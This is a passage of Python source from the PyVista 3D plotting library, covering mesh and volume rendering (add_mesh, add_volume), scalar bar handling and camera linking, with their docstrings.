rendering window, it will be replaced by the new actor.
texture : vtk.vtkTexture or np.ndarray or boolean, optional
A texture to apply if the input mesh has texture
coordinates. This will not work with MultiBlock
datasets. If set to ``True``, the first available texture
on the object will be used. If a string name is given, it
will pull a texture with that name associated to the input
mesh.
render_points_as_spheres : bool, optional
render_lines_as_tubes : bool, optional
smooth_shading : bool, optional
ambient : float, optional
When lighting is enabled, this is the amount of light from
0 to 1 that reaches the actor when not directed at the
light source emitted from the viewer. Default 0.0
diffuse : float, optional
The diffuse lighting coefficient. Default 1.0
specular : float, optional
The specular lighting coefficient. Default 0.0
specular_power : float, optional
The specular power. Between 0.0 and 128.0
nan_color : string or 3 item list, optional, defaults to gray
The color to use for all ``NaN`` values in the plotted scalar
array.
nan_opacity : float, optional
Opacity of ``NaN`` values. Should be between 0 and 1.
Default 1.0
culling : str, optional
Does not render faces that are culled. Options are ``'front'`` or
``'back'``. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Defaults ``False``.
rgb : bool, optional
If an 2 dimensional array is passed as the scalars, plot those
values as RGB(A) colors! ``rgba`` is also accepted alias for this.
Opacity (the A) is optional.
categories : bool, optional
If set to ``True``, then the number of unique values in the scalar
array will be used as the ``n_colors`` argument.
use_transparency : bool, optional
Invert the opacity mappings and make the values correspond to
transparency.
below_color : string or 3 item list, optional
Solid color for values below the scalars range (``clim``). This
will automatically set the scalar bar ``below_label`` to
``'Below'``
above_color : string or 3 item list, optional
Solid color for values below the scalars range (``clim``). This
will automatically set the scalar bar ``above_label`` to
``'Above'``
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float values in the
scalars range to annotate on the scalar bar and the values are the
the string annotations.
pickable : bool
Set whether this mesh is pickable
Return
------
actor: vtk.vtkActor
VTK actor of the mesh.
"""
# Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(mesh):
mesh = wrap(mesh)
if not is_pyvista_dataset(mesh):
raise TypeError('Object type ({}) not supported for plotting in PyVista.'.format(type(mesh)))
##### Parse arguments to be used for all meshes #####
if scalar_bar_args is None:
scalar_bar_args = {}
if show_edges is None:
show_edges = rcParams['show_edges']
if edge_color is None:
edge_color = rcParams['edge_color']
if show_scalar_bar is None:
show_scalar_bar = rcParams['show_scalar_bar']
if lighting is None:
lighting = rcParams['lighting']
# supported aliases
clim = kwargs.pop('rng', clim)
cmap = kwargs.pop('colormap', cmap)
culling = kwargs.pop("backface_culling", culling)
if render_points_as_spheres is None:
render_points_as_spheres = rcParams['render_points_as_spheres']
if name is None:
name = '{}({})'.format(type(mesh).__name__, mesh.memory_address)
if nan_color is None:
nan_color = rcParams['nan_color']
nan_color = list(parse_color(nan_color))
nan_color.append(nan_opacity)
if color is True:
color = rcParams['color']
if texture is False:
texture = None
if culling is True:
culling = 'backface'
rgb = kwargs.pop('rgba', rgb)
if "scalar" in kwargs:
raise TypeError("`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?")
assert_empty_kwargs(**kwargs)
##### Handle composite datasets #####
if isinstance(mesh, pyvista.MultiBlock):
# first check the scalars
if clim is None and scalars is not None:
# Get the data range across the array for all blocks
# if scalars specified
if isinstance(scalars, str):
clim = mesh.get_data_range(scalars)
else:
# TODO: an array was given... how do we deal with
# that? Possibly a 2D arrays or list of
# arrays where first index corresponds to
# the block? This could get complicated real
# quick.
raise RuntimeError('scalars array must be given as a string name for multiblock datasets.')
the_arguments = locals()
the_arguments.pop('self')
the_arguments.pop('mesh')
the_arguments.pop('kwargs')
if multi_colors:
# Compute unique colors for each index of the block
if has_matplotlib:
from itertools import cycle
cycler = matplotlib.rcParams['axes.prop_cycle']
colors = cycle(cycler)
else:
multi_colors = False
logging.warning('Please install matplotlib for color cycles')
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(mesh.GetNumberOfBlocks()):
if mesh[idx] is None:
continue
# Get a good name to use
next_name = '{}-{}'.format(name, idx)
# Get the data object
if not is_pyvista_dataset(mesh[idx]):
data = wrap(mesh.GetBlock(idx))
if not is_pyvista_dataset(mesh[idx]):
continue # move on if we can't plot it
else:
data = mesh.GetBlock(idx)
if data is None or (not isinstance(data, pyvista.MultiBlock) and data.n_points < 1):
# Note that a block can exist but be None type
# or it could have zeros points (be empty) after filtering
continue
# Now check that scalars is available for this dataset
if isinstance(data, vtk.vtkMultiBlockDataSet) or get_array(data, scalars) is None:
ts = None
else:
ts = scalars
if multi_colors:
color = next(colors)['color']
## Add to the scene
the_arguments['color'] = color
the_arguments['scalars'] = ts
the_arguments['name'] = next_name
the_arguments['texture'] = None
a = self.add_mesh(data, **the_arguments)
actors.append(a)
if (reset_camera is None and not self.camera_set) or reset_camera:
cpos = self.get_default_cam_pos()
self.camera_position = cpos
self.camera_set = False
self.reset_camera()
return actors
##### Plot a single PyVista mesh #####
# Compute surface normals if using smooth shading
if smooth_shading:
# extract surface if mesh is exterior
if not isinstance(mesh, pyvista.PolyData):
grid = mesh
mesh = grid.extract_surface()
ind = mesh.point_arrays['vtkOriginalPointIds']
# remap scalars
if isinstance(scalars, np.ndarray):
scalars = scalars[ind]
mesh.compute_normals(cell_normals=False, inplace=True)
if mesh.n_points < 1:
raise RuntimeError('Empty meshes cannot be plotted. Input mesh has zero points.')
# Try to plot something if no preference given
if scalars is None and color is None and texture is None:
# Prefer texture first
if len(list(mesh.textures.keys())) > 0:
texture = True
# If no texture, plot any active scalar
else:
# Make sure scalars components are not vectors/tuples
scalars = mesh.active_scalars_name
# Don't allow plotting of string arrays by default
if scalars is not None:# and np.issubdtype(mesh.active_scalars.dtype, np.number):
if stitle is None:
stitle = scalars
else:
scalars = None
# set main values
self.mesh = mesh
self.mapper = make_mapper(vtk.vtkDataSetMapper)
self.mapper.SetInputData(self.mesh)
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
actor, prop = self.add_actor(self.mapper,
reset_camera=reset_camera,
name=name, culling=culling,
pickable=pickable)
# Make sure scalars is a numpy array after this point
original_scalar_name = None
if isinstance(scalars, str):
self.mapper.SetArrayName(scalars)
original_scalar_name = scalars
scalars = get_array(mesh, scalars,
preference=preference, err=True)
if stitle is None:
stitle = original_scalar_name
if texture is True or isinstance(texture, (str, int)):
texture = mesh._activate_texture(texture)
if texture:
if isinstance(texture, np.ndarray):
texture = numpy_to_texture(texture)
if not isinstance(texture, (vtk.vtkTexture, vtk.vtkOpenGLTexture)):
raise TypeError('Invalid texture type ({})'.format(type(texture)))
if mesh.GetPointData().GetTCoords() is None:
raise AssertionError('Input mesh does not have texture coordinates to support the texture.')
actor.SetTexture(texture)
# Set color to white by default when using a texture
if color is None:
color = 'white'
if scalars is None:
show_scalar_bar = False
self.mapper.SetScalarModeToUsePointFieldData()
# Handle making opacity array =========================================
_custom_opac = False
if isinstance(opacity, str):
try:
# Get array from mesh
opacity = get_array(mesh, opacity,
preference=preference, err=True)
opacity = normalize(opacity)
_custom_opac = True
except:
# Or get opacity transfer function
opacity = opacity_transfer_function(opacity, n_colors)
else:
if scalars.shape[0] != opacity.shape[0]:
raise RuntimeError('Opacity array and scalars array must have the same number of elements.')
elif isinstance(opacity, (np.ndarray, list, tuple)):
opacity = np.array(opacity)
if scalars.shape[0] == opacity.shape[0]:
# User could pass an array of opacities for every point/cell
pass
else:
opacity = opacity_transfer_function(opacity, n_colors)
if use_transparency and np.max(opacity) <= 1.0:
opacity = 1 - opacity
elif use_transparency and isinstance(opacity, np.ndarray):
opacity = 255 - opacity
# Scalars formatting ==================================================
if cmap is None: # Set default map if matplotlib is available
if has_matplotlib:
cmap = rcParams['cmap']
# Set the array title for when it is added back to the mesh
if _custom_opac:
title = '__custom_rgba'
elif stitle is None:
title = 'Data'
else:
title = stitle
if scalars is not None:
# if scalars is a string, then get the first array found with that name
if not isinstance(scalars, np.ndarray):
scalars = np.asarray(scalars)
_using_labels = False
if not np.issubdtype(scalars.dtype, np.number):
# raise TypeError('Non-numeric scalars are currently not supported for plotting.')
# TODO: If str array, digitive and annotate
cats, scalars = np.unique(scalars.astype('|S'), return_inverse=True)
values = np.unique(scalars)
clim = [np.min(values) - 0.5, np.max(values) + 0.5]
title = '{}-digitized'.format(title)
n_colors = len(cats)
scalar_bar_args.setdefault('n_labels', 0)
_using_labels = True
if rgb:
if scalars.ndim != 2 or scalars.shape[1] < 3 or scalars.shape[1] > 4:
raise ValueError('RGB array must be n_points/n_cells by 3/4 in shape.')
if scalars.ndim != 1:
if rgb:
pass
elif scalars.ndim == 2 and (scalars.shape[0] == mesh.n_points or scalars.shape[0] == mesh.n_cells):
scalars = np.linalg.norm(scalars.copy(), axis=1)
title = '{}-normed'.format(title)
else:
scalars = scalars.ravel()
if scalars.dtype == np.bool:
scalars = scalars.astype(np.float)
def prepare_mapper(scalars):
# Scalars interpolation approach
if scalars.shape[0] == mesh.n_points:
self.mesh._add_point_array(scalars, title, True)
self.mapper.SetScalarModeToUsePointData()
elif scalars.shape[0] == mesh.n_cells:
self.mesh._add_cell_array(scalars, title, True)
self.mapper.SetScalarModeToUseCellData()
else:
raise_not_matching(scalars, mesh)
# Common tasks
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
if rgb or _custom_opac:
self.mapper.SetColorModeToDirectScalars()
else:
self.mapper.SetColorModeToMapScalars()
return
prepare_mapper(scalars)
table = self.mapper.GetLookupTable()
if log_scale:
table.SetScaleToLog10()
if _using_labels:
table.SetAnnotations(convert_array(values), convert_string_array(cats))
if isinstance(annotations, dict):
for val, anno in annotations.items():
table.SetAnnotation(float(val), str(anno))
# Set scalars range
if clim is None:
clim = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if np.any(clim) and not rgb:
self.mapper.scalar_range = clim[0], clim[1]
table.SetNanColor(nan_color)
if above_color:
table.SetUseAboveRangeColor(True)
table.SetAboveRangeColor(*parse_color(above_color, opacity=1))
scalar_bar_args.setdefault('above_label', 'Above')
if below_color:
table.SetUseBelowRangeColor(True)
table.SetBelowRangeColor(*parse_color(below_color, opacity=1))
scalar_bar_args.setdefault('below_label', 'Below')
if cmap is not None:
if not has_matplotlib:
cmap = None
logging.warning('Please install matplotlib for color maps.')
cmap = get_cmap_safe(cmap)
if categories:
if categories is True:
n_colors = len(np.unique(scalars))
elif isinstance(categories, int):
n_colors = categories
ctable = cmap(np.linspace(0, 1, n_colors))*255
ctable = ctable.astype(np.uint8)
# Set opactities
if isinstance(opacity, np.ndarray) and not _custom_opac:
ctable[:,-1] = opacity
if flip_scalars:
ctable = np.ascontiguousarray(ctable[::-1])
table.SetTable(VN.numpy_to_vtk(ctable))
if _custom_opac:
hue = normalize(scalars, minimum=clim[0], maximum=clim[1])
scalars = cmap(hue)[:, :3]
# combine colors and alpha into a Nx4 matrix
scalars = np.concatenate((scalars, opacity[:, None]), axis=1)
scalars = (scalars * 255).astype(np.uint8)
prepare_mapper(scalars)
else: # no cmap specified
if flip_scalars:
table.SetHueRange(0.0, 0.66667)
else:
table.SetHueRange(0.66667, 0.0)
else:
self.mapper.SetScalarModeToUseFieldData()
# Set actor properties ================================================
# select view style
if not style:
style = 'surface'
style = style.lower()
if style == 'wireframe':
prop.SetRepresentationToWireframe()
if color is None:
color = rcParams['outline_color']
elif style == 'points':
prop.SetRepresentationToPoints()
elif style == 'surface':
prop.SetRepresentationToSurface()
else:
raise Exception('Invalid style. Must be one of the following:\n'
'\t"surface"\n'
'\t"wireframe"\n'
'\t"points"\n')
prop.SetPointSize(point_size)
prop.SetAmbient(ambient)
prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
if smooth_shading:
prop.SetInterpolationToPhong()
else:
prop.SetInterpolationToFlat()
# edge display style
if show_edges:
prop.EdgeVisibilityOn()
rgb_color = parse_color(color)
prop.SetColor(rgb_color)
if isinstance(opacity, (float, int)):
prop.SetOpacity(opacity)
prop.SetEdgeColor(parse_color(edge_color))
if render_points_as_spheres:
prop.SetRenderPointsAsSpheres(render_points_as_spheres)
if render_lines_as_tubes:
prop.SetRenderLinesAsTubes(render_lines_as_tubes)
# legend label
if label:
if not isinstance(label, str):
raise AssertionError('Label must be a string')
geom = pyvista.single_triangle()
if scalars is not None:
geom = pyvista.Box()
rgb_color = parse_color('black')
geom.points -= geom.center
self._labels.append([geom, label, rgb_color])
# lighting display style
if not lighting:
prop.LightingOff()
# set line thickness
if line_width:
prop.SetLineWidth(line_width)
# Add scalar bar if available
if stitle is not None and show_scalar_bar and (not rgb or _custom_opac):
self.add_scalar_bar(stitle, **scalar_bar_args)
self.renderer.Modified()
return actor
def add_volume(self, volume, scalars=None, clim=None, resolution=None,
opacity='linear', n_colors=256, cmap=None, flip_scalars=False,
reset_camera=None, name=None, ambient=0.0, categories=False,
culling=False, multi_colors=False,
blending='composite', mapper=None,
stitle=None, scalar_bar_args=None, show_scalar_bar=None,
annotations=None, pickable=True, preference="point",
opacity_unit_distance=None, shade=False,
diffuse=0.7, specular=0.2, specular_power=10.0, **kwargs):
"""Add a volume, rendered using a smart mapper by default.
Requires a 3D :class:`numpy.ndarray` or :class:`pyvista.UniformGrid`.
Parameters
----------
volume : 3D numpy.ndarray or pyvista.UniformGrid
The input volume to visualize. 3D numpy arrays are accepted.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name of an
array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If ``scalars`` is
``None``, then the active scalars are used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
opacity : string or numpy.ndarray, optional
Opacity mapping for the scalars array.
A string can also be specified to map the scalars range to a
predefined opacity transfer function (options include: 'linear',
'linear_r', 'geom', 'geom_r'). Or you can pass a custum made
transfer function that is an array either ``n_colors`` in length or
shorter.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
cmap : str, optional
Name of the Matplotlib colormap to us when mapping the ``scalars``.
See available Matplotlib colormaps. Only applicable for when
displaying ``scalars``. Requires Matplotlib to be installed.
``colormap`` is also an accepted alias for this. If ``colorcet`` or
``cmocean`` are installed, their colormaps can be specified by name.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do
this as well.
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene
name : str, optional
The name for the added actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
ambient : float, optional
When lighting is enabled, this is the amount of light from
0 to 1 that reaches the actor when not directed at the
light source emitted from the viewer. Default 0.0.
culling : str, optional
Does not render faces that are culled. Options are ``'front'`` or
``'back'``. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Defaults ``False``.
categories : bool, optional
If set to ``True``, then the number of unique values in the scalar
array will be used as the ``n_colors`` argument.
multi_colors : bool, optional
Whether or not to use multiple colors when plotting MultiBlock
object. Blocks will be colored sequentially as 'Reds', 'Greens',
'Blues', and 'Grays'.
blending : str, optional
Blending mode for visualisation of the input object(s). Can be
one of 'additive', 'maximum', 'minimum', 'composite', or
'average'. Defaults to 'additive'.
mapper : str, optional
Volume mapper to use given by name. Options include:
``'fixed_point'``, ``'gpu'``, ``'open_gl'``, and ``'smart'``.
If ``None`` the ``"volume_mapper"`` in the ``rcParams`` is used.
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the scalar bar
to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If False, a scalar bar will not be added to the scene. Defaults
to ``True``.
stitle : string, optional
Scalar bar title. By default the scalar bar is given a title of the
the scalars array used to color the mesh.
To create a bar with no title, use an empty string (i.e. '').
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float values in the
scalars range to annotate on the scalar bar and the values are the
the string annotations.
opacity_unit_distance : float
Set/Get the unit distance on which the scalar opacity transfer
function is defined. Meaning that over that distance, a given
opacity (from the transfer function) is accumulated. This is
adjusted for the actual sampling distance during rendering. By
default, this is the length of the diagonal of the bounding box of
the volume divided by the dimensions.
shade : bool
Default off. If shading is turned on, the mapper may perform
shading calculations - in some cases shading does not apply
(for example, in a maximum intensity projection) and therefore
shading will not be performed even if this flag is on.
diffuse : float, optional
The diffuse lighting coefficient. Default 1.0
specular : float, optional
The specular lighting coefficient. Default 0.0
specular_power : float, optional
The specular power. Between 0.0 and 128.0
Return
------
actor: vtk.vtkVolume
VTK volume of the input data.
"""
# Handle default arguments
# Supported aliases
clim = kwargs.pop('rng', clim)
cmap = kwargs.pop('colormap', cmap)
culling = kwargs.pop("backface_culling", culling)
if "scalar" in kwargs:
raise TypeError("`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?")
assert_empty_kwargs(**kwargs)
if scalar_bar_args is None:
scalar_bar_args = {}
if show_scalar_bar is None:
show_scalar_bar = rcParams['show_scalar_bar']
if culling is True:
culling = 'backface'
if mapper is None:
mapper = rcParams["volume_mapper"]
# Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(volume):
if isinstance(volume, np.ndarray):
volume = wrap(volume)
if resolution is None:
resolution = [1,1,1]
elif len(resolution) != 3:
raise ValueError('Invalid resolution dimensions.')
volume.spacing = resolution
else:
volume = wrap(volume)
if not is_pyvista_dataset(volume):
raise TypeError('Object type ({}) not supported for plotting in PyVista.'.format(type(volume)))
else:
# HACK: Make a copy so the original object is not altered.
# Also, place all data on the nodes as issues arise when
# volume rendering on the cells.
volume = volume.cell_data_to_point_data()
if name is None:
name = '{}({})'.format(type(volume).__name__, volume.memory_address)
if isinstance(volume, pyvista.MultiBlock):
from itertools import cycle
cycler = cycle(['Reds', 'Greens', 'Blues', 'Greys', 'Oranges', 'Purples'])
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(volume.GetNumberOfBlocks()):
if volume[idx] is None:
continue
# Get a good name to use
next_name = '{}-{}'.format(name, idx)
# Get the data object
block = wrap(volume.GetBlock(idx))
if resolution is None:
try:
block_resolution = block.GetSpacing()
except AttributeError:
block_resolution = resolution
else:
block_resolution = resolution
if multi_colors:
color = next(cycler)
else:
color = cmap
a = self.add_volume(block, resolution=block_resolution, opacity=opacity,
n_colors=n_colors, cmap=color, flip_scalars=flip_scalars,
reset_camera=reset_camera, name=next_name,
ambient=ambient, categories=categories,
culling=culling, clim=clim,
mapper=mapper, pickable=pickable,
opacity_unit_distance=opacity_unit_distance,
shade=shade, diffuse=diffuse, specular=specular,
specular_power=specular_power)
actors.append(a)
return actors
if not isinstance(volume, pyvista.UniformGrid):
raise TypeError('Type {} not supported for volume rendering at this time. Use `pyvista.UniformGrid`.'.format(type(volume)))
if opacity_unit_distance is None:
opacity_unit_distance = volume.length / (np.mean(volume.dimensions) - 1)
if scalars is None:
# Make sure scalars components are not vectors/tuples
scalars = volume.active_scalars
# Don't allow plotting of string arrays by default
if scalars is not None and np.issubdtype(scalars.dtype, np.number):
if stitle is None:
stitle = volume.active_scalars_info[1]
else:
raise RuntimeError('No scalars to use for volume rendering.')
elif isinstance(scalars, str):
pass
##############
title = 'Data' if stitle is None else stitle
if isinstance(scalars, str):
title = scalars
scalars = get_array(volume, scalars,
preference=preference, err=True)
if stitle is None:
stitle = title
if not isinstance(scalars, np.ndarray):
scalars = np.asarray(scalars)
if not np.issubdtype(scalars.dtype, np.number):
raise TypeError('Non-numeric scalars are currently not supported for volume rendering.')
if scalars.ndim != 1:
scalars = scalars.ravel()
if scalars.dtype == np.bool or scalars.dtype == np.uint8:
scalars = scalars.astype(np.float)
# Define mapper, volume, and add the correct properties
mappers = {
'fixed_point': vtk.vtkFixedPointVolumeRayCastMapper,
'gpu': vtk.vtkGPUVolumeRayCastMapper,
'open_gl': vtk.vtkOpenGLGPUVolumeRayCastMapper,
'smart': vtk.vtkSmartVolumeMapper,
}
if not isinstance(mapper, str) or mapper not in mappers.keys():
raise RuntimeError('Mapper ({}) unknown. Available volume mappers include: {}'.format(mapper, ', '.join(mappers.keys())))
self.mapper = make_mapper(mappers[mapper])
# Scalars interpolation approach
if scalars.shape[0] == volume.n_points:
volume._add_point_array(scalars, title, True)
self.mapper.SetScalarModeToUsePointData()
elif scalars.shape[0] == volume.n_cells:
volume._add_cell_array(scalars, title, True)
self.mapper.SetScalarModeToUseCellData()
else:
raise_not_matching(scalars, volume)
# Set scalars range
if clim is None:
clim = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
###############
scalars = scalars.astype(np.float)
with np.errstate(invalid='ignore'):
idxs0 = scalars < clim[0]
idxs1 = scalars > clim[1]
scalars[idxs0] = clim[0]
scalars[idxs1] = clim[1]
scalars = ((scalars - np.nanmin(scalars)) / (np.nanmax(scalars) - np.nanmin(scalars))) * 255
# scalars = scalars.astype(np.uint8)
volume[title] = scalars
self.mapper.scalar_range = clim
# Set colormap and build lookup table
table = vtk.vtkLookupTable()
# table.SetNanColor(nan_color) # NaN's are chopped out with current implementation
# above/below colors not supported with volume rendering
if isinstance(annotations, dict):
for val, anno in annotations.items():
table.SetAnnotation(float(val), str(anno))
if cmap is None: # Set default map if matplotlib is available
if has_matplotlib:
cmap = rcParams['cmap']
if cmap is not None:
if not has_matplotlib:
cmap = None
raise RuntimeError('Please install matplotlib for volume rendering.')
cmap = get_cmap_safe(cmap)
if categories:
if categories is True:
n_colors = len(np.unique(scalars))
elif isinstance(categories, int):
n_colors = categories
if flip_scalars:
cmap = cmap.reversed()
color_tf = vtk.vtkColorTransferFunction()
for ii in range(n_colors):
color_tf.AddRGBPoint(ii, *cmap(ii)[:-1])
# Set opacities
if isinstance(opacity, (float, int)):
opacity_values = [opacity] * n_colors
elif isinstance(opacity, str):
opacity_values = pyvista.opacity_transfer_function(opacity, n_colors)
elif isinstance(opacity, (np.ndarray, list, tuple)):
opacity = np.array(opacity)
opacity_values = opacity_transfer_function(opacity, n_colors)
opacity_tf = vtk.vtkPiecewiseFunction()
for ii in range(n_colors):
opacity_tf.AddPoint(ii, opacity_values[ii] / n_colors)
# Now put color tf and opacity tf into a lookup table for the scalar bar
table.SetNumberOfTableValues(n_colors)
lut = cmap(np.array(range(n_colors))) * 255
lut[:,3] = opacity_values
lut = lut.astype(np.uint8)
table.SetTable(VN.numpy_to_vtk(lut))
table.SetRange(*clim)
self.mapper.lookup_table = table
self.mapper.SetInputData(volume)
blending = blending.lower()
if blending in ['additive', 'add', 'sum']:
self.mapper.SetBlendModeToAdditive()
elif blending in ['average', 'avg', 'average_intensity']:
self.mapper.SetBlendModeToAverageIntensity()
elif blending in ['composite', 'comp']:
self.mapper.SetBlendModeToComposite()
elif blending in ['maximum', 'max', 'maximum_intensity']:
self.mapper.SetBlendModeToMaximumIntensity()
elif blending in ['minimum', 'min', 'minimum_intensity']:
self.mapper.SetBlendModeToMinimumIntensity()
else:
raise ValueError('Blending mode \'{}\' invalid. '.format(blending) +
'Please choose one ' + 'of \'additive\', '
'\'composite\', \'minimum\' or ' + '\'maximum\'.')
self.mapper.Update()
self.volume = vtk.vtkVolume()
self.volume.SetMapper(self.mapper)
prop = vtk.vtkVolumeProperty()
prop.SetColor(color_tf)
prop.SetScalarOpacity(opacity_tf)
prop.SetAmbient(ambient)
prop.SetScalarOpacityUnitDistance(opacity_unit_distance)
prop.SetShade(shade)
prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
self.volume.SetProperty(prop)
actor, prop = self.add_actor(self.volume, reset_camera=reset_camera,
name=name, culling=culling,
pickable=pickable)
# Add scalar bar
if stitle is not None and show_scalar_bar:
self.add_scalar_bar(stitle, **scalar_bar_args)
self.renderer.Modified()
return actor
def update_scalar_bar_range(self, clim, name=None):
"""Update the value range of the active or named scalar bar.
Parameters
----------
2 item list
The new range of scalar bar. Example: ``[-1, 2]``.
name : str, optional
The title of the scalar bar to update
"""
if isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if len(clim) != 2:
raise TypeError('clim argument must be a length 2 iterable of values: (min, max).')
if name is None:
if not hasattr(self, 'mapper'):
raise RuntimeError('This plotter does not have an active mapper.')
self.mapper.scalar_range = clim
return
# Use the name to find the desired actor
def update_mapper(mapper_helper):
mapper_helper.scalar_range = clim
return
try:
for mh in self._scalar_bar_mappers[name]:
update_mapper(mh)
except KeyError:
raise KeyError('Name ({}) not valid/not found in this plotter.')
return
def clear(self):
"""Clear plot by removing all actors and properties."""
for renderer in self.renderers:
renderer.clear()
for renderer in self._background_renderers:
if renderer is not None:
renderer.clear()
self._scalar_bar_slots = set(range(MAX_N_COLOR_BARS))
self._scalar_bar_slot_lookup = {}
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
self._scalar_bar_actors = {}
self._scalar_bar_widgets = {}
self.mesh = None
def link_views(self, views=0):
"""Link the views' cameras.
Parameters
----------
views : int | tuple or list
If ``views`` is int, link the views to the given view
index or if ``views`` is a tuple or a list, link the given
views cameras.
"""
if isinstance(views, int):
for renderer in self.renderers:
renderer.camera = self.renderers[views].camera
elif isinstance(views, collections.Iterable):
for view_index in views:
self.renderers[view_index].camera = \
self.renderers[views[0]].camera
else:
raise TypeError('Expected type is int, list or tuple:'
'{} is given'.format(type(views)))
def unlink_views(self, views=None):
"""Unlink the views' cameras.
Parameters
----------
views : None | int | tuple or list
If ``views`` is None unlink all the views, if ``views``
is int unlink the selected view's camera or if ``views``
is a tuple or a list, unlink the given views cameras.
"""
if views is None:
for renderer in self.renderers:
renderer.camera = vtk.vtkCamera()
renderer.reset_camera()
elif isinstance(views, int):
self.renderers[views].camera = vtk.vtkCamera()
self.renderers[views].reset_camera()
elif isinstance(views, collections.Iterable):
for view_index in views:
self.renderers[view_index].camera = vtk.vtkCamera()
self.renderers[view_index].reset_camera()
else:
raise TypeError('Expected type is None, int, list or tuple:'
'{} is given'.format(type(views)))
def add_scalar_bar(self, title=None, n_labels=5, italic=False,
bold=False, title_font_size=None,
label_font_size=None, color=None,
font_family=None, shadow=False, mapper=None,
width=None, height=None, position_x=None,
position_y=None, vertical=None,
interactive=None, fmt=None, use_opacity=True,
outline=False, nan_annotation=False,
below_label=None, above_label=None,
background_color=None, n_colors=None, fill=False):
"""Create scalar bar using the ranges as set by the last input mesh.
Parameters
----------
title : string, optional
Title of the scalar bar. Default None
n_labels : int, optional
Number of labels to use for the scalar bar.
italic : bool, optional
Italicises title and bar labels. Default False.
bold : bool, optional
Bolds title and bar labels. Default True
title_font_size : float, optional
Sets the size of the title font. Defaults to None and is sized
automatically.
label_font_size : float, optional
Sets the size of the title font. Defaults to None and is sized
automatically.
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
font_family : string, optional
Font family. Must be either courier, times, or arial.
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
width : float, optional
The percentage (0 to 1) width of the window for the colorbar
height : float, optional
The percentage (0 to 1) height of the window for the colorbar
position_x : float, optional
The percentage (0 to 1) along the windows's horizontal
direction to place the bottom left corner of the colorbar
position_y : float, optional
The percentage (0 to 1) along the windows's vertical
direction to place the bottom left corner of the colorbar
interactive : bool, optional
Use a widget to control the size and location of the scalar bar.
use_opacity : bool, optional
Optionally display the opacity mapping on the scalar bar
outline : bool, optional
Optionally outline the scalar bar to make opacity mappings more
obvious.
nan_annotation : bool, optional
Annotate the NaN color
below_label : str, optional
String annotation for values below the scalars range
above_label : str, optional
String annotation for values above the scalars range
background_color : array, optional
The color used for the background in RGB format.
n_colors : int, optional
The maximum number of color displayed in the scalar bar.
fill : bool
Draw a filled box behind the scalar bar with the ``background_color``
Notes
-----
Setting title_font_size, or label_font_size disables automatic font
sizing for both the title and label.
"""
if interactive is None:
interactive = rcParams['interactive']
if font_family is None:
font_family = rcParams['font']['family']
if label_font_size is None:
label_font_size = rcParams['font']['label_size']
if title_font_size is None:
title_font_size = rcParams['font']['title_size']
if color is None:
color = rcParams['font']['color']
if fmt is None:
fmt = rcParams['font']['fmt']
if vertical is None:
if rcParams['colorbar_orientation'].lower() == 'vertical':
vertical = True
# Automatically choose size if not specified
if width is None:
if vertical:
width = rcParams['colorbar_vertical']['width']
else:
width = rcParams['colorbar_horizontal']['width']
if height is None:
if vertical:
height = rcParams['colorbar_vertical']['height']
else:
height = rcParams['colorbar_horizontal']['height']
# check if maper exists
if mapper is None:
if not hasattr(self, 'mapper') or self.mapper is None:
raise Exception('Mapper does not exist. '
'Add a mesh with scalars first.')
mapper = self.mapper
if title:
# Check that this data hasn't already been plotted
if title in list(self._scalar_bar_ranges.keys()):
clim = list(self._scalar_bar_ranges[title])
newrng = mapper.scalar_range
oldmappers = self._scalar_bar_mappers[title]
# get max for range and reset everything
if newrng[0] < clim[0]:
clim[0] = newrng[0]
if newrng[1] > clim[1]:
clim[1] = newrng[1]
for mh in oldmappers:
mh.scalar_range = clim[0], clim[1]
mapper.scalar_range = clim[0], clim[1]
self._scalar_bar_mappers[title].append(mapper)
self._scalar_bar_ranges[title] = clim
# Color bar already present and ready to be used so returning
return
# Automatically choose location if not specified
if position_x is None or position_y is None:
try:
slot = min(self._scalar_bar_slots)
self._scalar_bar_slots.remove(slot)
self._scalar_bar_slot_lookup[title] = slot
except:
raise RuntimeError('Maximum number of color bars reached.')
if position_x is None:
if vertical:
position_x = rcParams['colorbar_vertical']['position_x']
position_x -= slot * (width + 0.2 * width)
else:
position_x = rcParams['colorbar_horizontal']['position_x']
